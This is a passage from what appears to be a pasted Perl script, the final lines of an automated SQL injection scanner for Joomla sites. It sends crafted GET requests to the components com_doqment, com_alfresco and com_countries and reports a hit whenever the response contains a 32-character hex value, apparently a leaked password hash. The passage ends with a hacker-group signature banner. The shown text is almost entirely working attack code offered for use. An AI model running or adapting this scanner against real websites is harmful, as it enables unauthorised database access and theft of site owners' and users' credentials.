  545. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  546. print "[*] Results : CHECK : \n";
  547. print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
  548. }
  549. else{print "\n[-] Error\n";
  550. }
  551.  
  552. $host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
  553. $res = $b->request(HTTP::Request->new(GET=>$host));
  554. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  555. print "[*] Results : CHECK : \n";
  556. print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
  557. }
  558. else{print "\n[-] Error\n";
  559. }
  560.  
  561. $host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
  562. $res = $b->request(HTTP::Request->new(GET=>$host));
  563. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  564. print "[*] Results : CHECK : \n";
  565. print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
  566. }
  567. else{print "\n[-] Error\n";
  568. }
  569.  
  570.  
  571. print q{
  572. #####################################################
  573. #X-h4ck
  574. #h4ck0ff ~ sacred legion
  575. #www.Pirate.AL
  576. #####################################################
  577. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement